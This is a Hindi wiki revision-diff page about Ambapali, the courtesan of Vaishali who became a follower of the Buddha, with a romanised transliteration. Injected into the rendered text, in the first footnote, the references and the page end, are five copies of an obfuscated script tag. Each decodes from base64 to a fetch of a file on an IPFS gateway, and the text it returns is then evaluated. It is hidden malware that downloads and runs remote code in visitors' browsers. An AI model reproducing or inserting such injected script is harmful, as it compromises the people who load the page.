Difference between revisions of "अंबपाली"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
'''अंबपाली''' [[महात्मा बुद्ध]] के समकालीन [[वैशाली]] की [[लिच्छवी]] गणिका थी। वह भगवान बुद्ध के प्रभाव से उनकी शिष्या हो गई थी। अंबपाली ने बौद्ध संघ का अनेक प्रकार के दानों से महत उपकार किया। वह बुद्ध और उनके संघ की अनन्य उपासिका हो गई थी और उसने अपने पाप के जीवन से मुख मोड़कर अर्हत्‌ का जीवन बिताना स्वीकार किया था।
+
'''अंबपाली''' [[महात्मा बुद्ध]] के समकालीन [[वैशाली]] की 'लिच्छवी' गणिका थी। वह भगवान बुद्ध के प्रभाव से उनकी शिष्या बन गई थी। अंबपाली ने बौद्ध संघ का अनेक प्रकार के दानों से महत उपकार किया। वह बुद्ध और उनके संघ की अनन्य उपासिका हो गई थी। उसने अपने पाप के जीवन से मुख मोड़कर अर्हत्‌ का जीवन बिताना स्वीकार किया था।
  
*महात्मा बुद्ध 'राजगृह' जाते या लौटते समय [[वैशाली]] में अवश्य रुकते थे। यहीं पर एक बार उन्होंने अंबपाली का भी आतिथ्य ग्रहण किया था।<ref>{{cite web |url=http://khoj.bharatdiscovery.org/w/index.php?title=%E0%A4%85%E0%A4%82%E0%A4%AC%E0%A4%AA%E0%A4%BE%E0%A4%B2%E0%A5%80&action=edit|title=अंबपाली |accessmonthday=01 फ़रवरी|accessyear=2014 |last= |first= |authorlink= |format= |publisher= |language=हिन्दी}}</ref>
+
*महात्मा बुद्ध '[[राजगृह]]' जाते या लौटते समय [[वैशाली]] में अवश्य रुकते थे। यहीं पर एक बार उन्होंने अंबपाली का भी आतिथ्य ग्रहण किया था।<ref>{{cite web |url=http://khoj.bharatdiscovery.org/w/index.php?title=%E0%A4%85%E0%A4%82%E0%A4%AC%E0%A4%AA%E0%A4%BE%E0%A4%B2%E0%A5%80&action=edit|title=अंबपाली |accessmonthday=01 फ़रवरी|accessyear=2014 |last= |first= |authorlink= |format= |publisher= |language=हिन्दी}}</ref>
*[[बौद्ध]] ग्रंथों में बुद्ध के जीवनचरित पर प्रकाश डालने वाली घटनाओं का जो वर्णन मिलता है, उन्हीं में से अंबपाली के संबंध की एक प्रसिद्ध और रूचिकर घटना है-
+
*[[बौद्ध]] ग्रंथों में बुद्ध के जीवन चरित पर प्रकाश डालने वाली घटनाओं का जो वर्णन मिलता है, उन्हीं में से अंबपाली के संबंध की एक प्रसिद्ध और रूचिकर घटना है-
  
<blockquote>कहा जाता है कि जब 'तथागत' ([[बुद्ध]]) एक बार वैशाली में ठहरे, तब जहाँ उन्होंने देवताओं की तरह दीप्यमान लिच्छवि राजपुत्रों की भोजन के लिए प्रार्थना अस्वीकार कर दी, वहीं उन्होंने गणिका अंबपाली की निष्ठा से प्रसन्न होकर उसका आतिथ्य स्वीकार किया। इससे गर्विणी अंबपाली ने उन राजपुत्रों को लज्जित करते हुए अपने रथ को उनके रथ के बराबर हाँका। उसने संघ को [[आम|आमों]] का अपना बगीचा भी दान कर दिया था, जिससे वह अपना चौमासा वहाँ बिता सके।</blockquote>
+
<blockquote>कहा जाता है कि जब 'तथागत' ([[बुद्ध]]) एक बार वैशाली में ठहरे, तब जहाँ उन्होंने [[देवता|देवताओं]] की तरह दीप्यमान [[लिच्छवी वंश|लिच्छवी]] राजपुत्रों की भोजन के लिए प्रार्थना अस्वीकार कर दी, वहीं उन्होंने गणिका अंबपाली की निष्ठा से प्रसन्न होकर उसका आतिथ्य स्वीकार किया। इससे गर्विणी अंबपाली ने उन राजपुत्रों को लज्जित करते हुए अपने रथ को उनके रथ के बराबर हाँका। उसने संघ को [[आम|आमों]] का अपना बगीचा भी दान कर दिया, जिससे वह अपना चौमासा वहाँ बिता सके।</blockquote>
  
*इसमें संदेह नहीं कि अंबपाली ऐतिहासिक व्यक्ति थी, यद्यपि कथा के चमत्कारों ने उसे असाधारण बना दिया है। संभवत वह अभिजातकुलीना थी और इतनी सुंदरी थी कि लिच्छवियों की परंपरा के अनुसार उसके [[पिता]] को उसे सर्वभोग्या बनाना पड़ा।
+
*इसमें संदेह नहीं कि अंबपाली ऐतिहासिक महिला थी, यद्यपि कथा के चमत्कारों ने उसे असाधारण बना दिया है। संभवत वह अभिजातकुलीना थी और इतनी सुंदरी थी कि लिच्छवियों की परंपरा के अनुसार उसके [[पिता]] को उसे सर्वभोग्या बनाना पड़ा।
*संभवत उसने गणिका जीवन भी बिताया था और उसके कृपापात्रों में शायद [[मगध]] का राजा [[बिंबिसार]] भी था।
+
*संभवत उसने गणिका जीवन भी बिताया था। उसके कृपापात्रों में शायद [[मगध]] का राजा [[बिंबिसार]] भी था।
 
*बिंबिसार का अंबपाली से एक पुत्र होना भी बताया जाता है। जो भी हो, बाद में अंबपाली [[बुद्ध]] और उनके संघ की अनन्य उपासिका हो गई थी और उसने पाप के जीवन से मुख मोड़ लिया था।
 
*बिंबिसार का अंबपाली से एक पुत्र होना भी बताया जाता है। जो भी हो, बाद में अंबपाली [[बुद्ध]] और उनके संघ की अनन्य उपासिका हो गई थी और उसने पाप के जीवन से मुख मोड़ लिया था।
  

Revision as of 14:03, 1 February 2014

aanbapali mahatma buddh ke samakalin vaishali ki 'lichchhavi' ganika thi. vah bhagavan buddh ke prabhav se unaki shishya ban gee thi. aanbapali ne bauddh sangh ka anek prakar ke danoan se mahat upakar kiya. vah buddh aur unake sangh ki anany upasika ho gee thi. usane apane pap ke jivan se mukh mo dakar arhath‌ ka jivan bitana svikar kiya tha.

  • mahatma buddh 'rajagrih' jate ya lautate samay vaishali mean avashy rukate the. yahian par ek bar unhoanne aanbapali ka bhi atithy grahan kiya tha.[1]
  • bauddh granthoan mean buddh ke jivan charit par prakash dalane vali ghatanaoan ka jo varnan milata hai, unhian mean se aanbapali ke sanbandh ki ek prasiddh aur roochikar ghatana hai-

kaha jata hai ki jab 'tathagat' (buddh) ek bar vaishali mean thahare, tab jahaan unhoanne devataoan ki tarah dipyaman lichchhavi rajaputroan ki bhojan ke lie prarthana asvikar kar di, vahian unhoanne ganika aanbapali ki nishtha se prasann hokar usaka atithy svikar kiya. isase garvini aanbapali ne un rajaputroan ko lajjit karate hue apane rath ko unake rath ke barabar haanka. usane sangh ko amoan ka apana bagicha bhi dan kar diya, jisase vah apana chaumasa vahaan bita sake.

  • isamean sandeh nahian ki aanbapali aitihasik mahila thi, yadyapi katha ke chamatkaroan ne use asadharan bana diya hai. sanbhavat vah abhijatakulina thi aur itani suandari thi ki lichchhaviyoan ki paranpara ke anusar usake pita ko use sarvabhogya banana p da.
  • sanbhavat usane ganika jivan bhi bitaya tha. usake kripapatroan mean shayad magadh ka raja bianbisar bhi tha.
  • bianbisar ka aanbapali se ek putr hona bhi bataya jata hai. jo bhi ho, bad mean aanbapali buddh aur unake sangh ki anany upasika ho gee thi aur usane pap ke jivan se mukh mo d liya tha.
  1. REDIRECTsaancha:inhean bhi dekhean<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. aanbapali (hindi). . abhigaman tithi: 01 faravari, 2014.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>